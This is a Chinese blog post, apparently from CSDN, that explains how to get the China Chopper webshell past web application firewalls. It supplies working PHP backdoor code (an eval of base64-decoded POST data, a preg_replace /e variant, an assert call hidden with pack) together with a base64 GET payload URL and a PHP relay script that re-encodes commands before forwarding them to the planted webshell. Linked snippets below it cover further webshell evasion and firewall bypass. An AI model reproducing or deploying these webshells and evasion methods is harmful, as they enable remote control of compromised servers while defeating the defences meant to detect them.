菜刀php木马_菜刀php过waf

最新推荐文章于 2024-04-16 10:38:37 发布
最新推荐文章于 2024-04-16 10:38:37 发布
阅读量789 收藏
点赞数
文章标签: 菜刀php木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34098846/article/details/115099322
版权
本文详细介绍了如何通过修改菜刀客户端、使用加密传输和中转服务器等方式,来规避Web应用防火墙(WAF)对PHP菜刀连接的拦截。方法包括将eval语句移至服务器端、使用base64编码的GET请求以及通过加密中转实现数据解密,从而确保菜刀能够正常工作并避开WAF的检测。
摘要由CSDN通过智能技术生成

关于PHP

一、waf为啥会拦截菜刀。

菜刀在连接时,会向server端POST数据,抓包查看:

imgpxy.php?url=gnp.840112535102113102%2F1131_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

会看到他向server端post了 @eval(base64_decode($_POST[z0])); 一般的waf都会拦截eval的。

二、要想菜刀仍然正常工作,就必须让菜刀中的内置的@eval(base64_decode($_POST[z0]));代码不被waf拦截,但又可以传递到server端。

方案一:修改菜刀

(1)修改菜刀,将菜刀客户端的eval(base64_decode($_POST[z0]))去掉,写进服务端去。

于是server端代码为:<?php

if($_POST['c']!='')

{

@eval(base64_decode($_POST[z0]));

}

?>

客户端用修改后的菜刀连接。

说明:这种方法是将菜刀内置的eval(base64_decode($_POST[z0]))直接写到server端。

(2)修改菜刀,将菜刀客户端的eval(base64_decode($_POST[z0]))去掉,用get方式将eval(base64_decode($_POST[z0]))的base64加密形式发到服务端。

server端代码:<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>

客户端用修改后的菜刀连接:

http://www.s2ck.cc/test.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==

说明:这种方法是将菜刀内置的 eval(base64_decode($_POST[z0]))通过base64加密,然后通过get方式传到server端。

方案二:中转

client->自己服务器/应用(加密)->防火墙->真实地址(解密)

(3)通过中转,将菜刀post的eval(base64_decode($_POST[z0]))进行加密。服务端进行解密。

server端代码:<?php

$func=pack("c6",97,115,115,101,114,116);

$_POST['c']=base64_decode( $_POST['c']) ;

$func($_POST['c']);

?>

中转端代码:<?php

$handle=curl_init();

$DATA=array();

$DATA=$_POST;

$DATA['c']=base64_encode(substr($DATA['c'],1));

curl_setopt($handle,CURLOPT_URL,'http://www.s2ck.cc/1.php');

curl_setopt($handle,CURLOPT_HEADER,0);

curl_setopt($handle,CURLOPT_RETURNTRANSFER, 1);

curl_setopt($handle,CURLOPT_POST,1);

curl_setopt($handle,CURLOPT_POSTFIELDS,$DATA);

$output=curl_exec($handle);

if($output === FALSE) {

echo "cURL Error: " . curl_error($handle);

}

echo ($output);

curl_close($handle);

?>

客户端:

用原版菜刀连接。

说明:这种方法是将菜刀内置的 eval(base64_decode($_POST[z0]))通过中转端进行加密,然后server端进行解密。从而绕过waf

我就是摘星星的少年
关注
ctf之AWD(3)_重写菜刀
余韵
09-16 793
ctf之AWD(3)_重写菜刀 原理 多次post cmd=@eval(base64_decode($_POST[z0])); #cmd为原密码,z0为新密码 wireshark抓包分析 菜刀2011 post数据分析 &cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B &z0=QGluaV9zZXQoImRpc...
菜刀php木马_Weevely(php菜刀)工具使用详解
weixin_36205101的博客
03-09 1112
-前言weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。项目地址:https://github.com/epinna/Weevely下面就针对该工具...
10-菜刀连接木马
最新发布
tianxiadiiw的博客
04-16 555
可以获取你想要的配置信息,也可以用system函数来输入命令。是属于辅助工具,并且菜刀的传输过程是明文传输的,目前已经被WAF进行防护了。接下来就可以连接菜刀,使用菜刀来连接木马然后就可以查看到服务器里面的东西了。先看是否存在注入点,有下图所示则表示存在注入点==》可以进行接下来的操作。2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数名。写入一句话的木马进行探测,如果嗅探成功后在进行大马的上传。找到了漏洞后,并且上传了木马之后才能使用的两款工具。有文件,则说明可以读任意路径的文件。
一句话木马原理介绍和中国菜刀原理的介绍
Firebasky的博客
06-07 6590
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句话木马菜刀的原理。 下面的原理是自己看其他大佬写的和自己总结的一些介绍。 希望能够帮助老表们~~~ 一句话木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句话木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
菜刀phpwaf
weixin_34221073的博客
06-15 458
关于PHP 一、waf为啥会拦截菜刀菜刀在连接时,会向server端POST数据,抓包查看:会看到他向server端post了 @eval(base64_decode($_POST[z0])); 一般的waf都会拦截eval的。 二、要想菜刀仍然正常工作,就必须让菜刀中的内置的@eval(base64_decode($_POST[z0]));代码不被waf拦截,但又可以传递到server端。...
我的WafBypass之道(Misc篇)
weixin_33713503的博客
03-19 360
先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com; Author:Tr3jer_CongRong Blog:www.Thinkings.org 第一篇《【独家连载】我的WafBypass之道(SQL注入篇)》地址:https://www.secpulse...
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 1804
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf
04-27
为了绕过Web应用防火墙(WAF)的检测,木马通常需要变形,例如替换关键词、加密或使用无用函数来构造关键词。 **6.1.2 小马变形** 小马的变形是为了逃避WAF的检查。可以通过替换部分字符、加密关键词或使用多个函数...
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 889
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,phpwaf一句话)
SetToken的博客
11-10 9272
最新过狗一句话,2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,phpwaf一句话)
PHP保存Base64图片base64_decode的问题整理
10-16
在本篇文章里小编给大家整理的是关于PHP保存Base64图片base64_decode的问题,需要的朋友们参考下。
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2413
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1785
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
实战|记一次绕过宝塔防火墙的BC站渗透
zhangge3663的博客
05-06 1万+
0x00 信息收集 由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息 这是一个查询代理帐号的站 url输入admin 自动跳转至后台 看这个参数,猜测可能是thinkCMF 0x01 getshell thinkcmf正好有一个RCE 可以尝试一下 ?a=fetch&templateFile=public/index&prefix='' &content=<php>file_put_content
菜刀、冰蝎、蚁剑、哥斯拉的流量特征
热门推荐
eternitymd的博客
04-29 2万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0])),(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
怎么能防止网站被注入eval(base64_decode这种类型的木马
superobser的博客
11-28 3489
一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了 网站挂马是每个网站最头痛的问题,解决办法:1.在程序中很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉 听朋友说 Sine安全 不错 你可以去看看。 清马+修补漏洞=彻底解决 清马 1、找挂马的标签,比如有或<ifra
PHP Web 木马扫描器代码
yijinbaiyi的博客
02-29 996
scanner.php: <?php /**************PHP Web木马扫描器************************/ /* [+] 功能: web版php木马扫描工具*/ /* [+] 注意: 扫描出来的文件并不一定就是后门, */ /* 请自行判断、审核、对比原文件。*/ /* 如果你不确定扫出来的文件是否为后门,*/ /* 欢迎你把该文件发给我进行分析。*/ ...
菜刀php教程,中国菜刀(chopper)功能介绍及使用教程
weixin_34774527的博客
03-09 5733
中国菜刀(下载地址:)是一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。注:单独的菜刀没有效果,需要服务器端有一句话后门,或漏洞,例如这样的:89/mingfang...
2017-01-27-一句话木马原理详解
Be Smart
03-17 4829
layout: post title: “一句话木马原理详解” categories: [网络安全CyberSecurity] tags: [一句话木马] 作者:愤怒的小辣椒 链接:https://www.zhihu.com/question/269213687/answer/1088999932 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 首先理解,eval()是把里面的内容按照php代码去执行 菜刀通过你的一句话木马去进行http请求,然后用经过base64编.
绕过WAF:ASP与PHP参数复用漏洞与异常Method利用
在IT安全领域,复参数绕过是一种常见的Web应用程序防火墙(WAF)绕过技术,特别是在ASP(Active Server Pages)和PHP这样的服务器端脚本语言中。本文档主要讨论了如何利用这种技巧来绕过WAF的检测,以便进行恶意操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值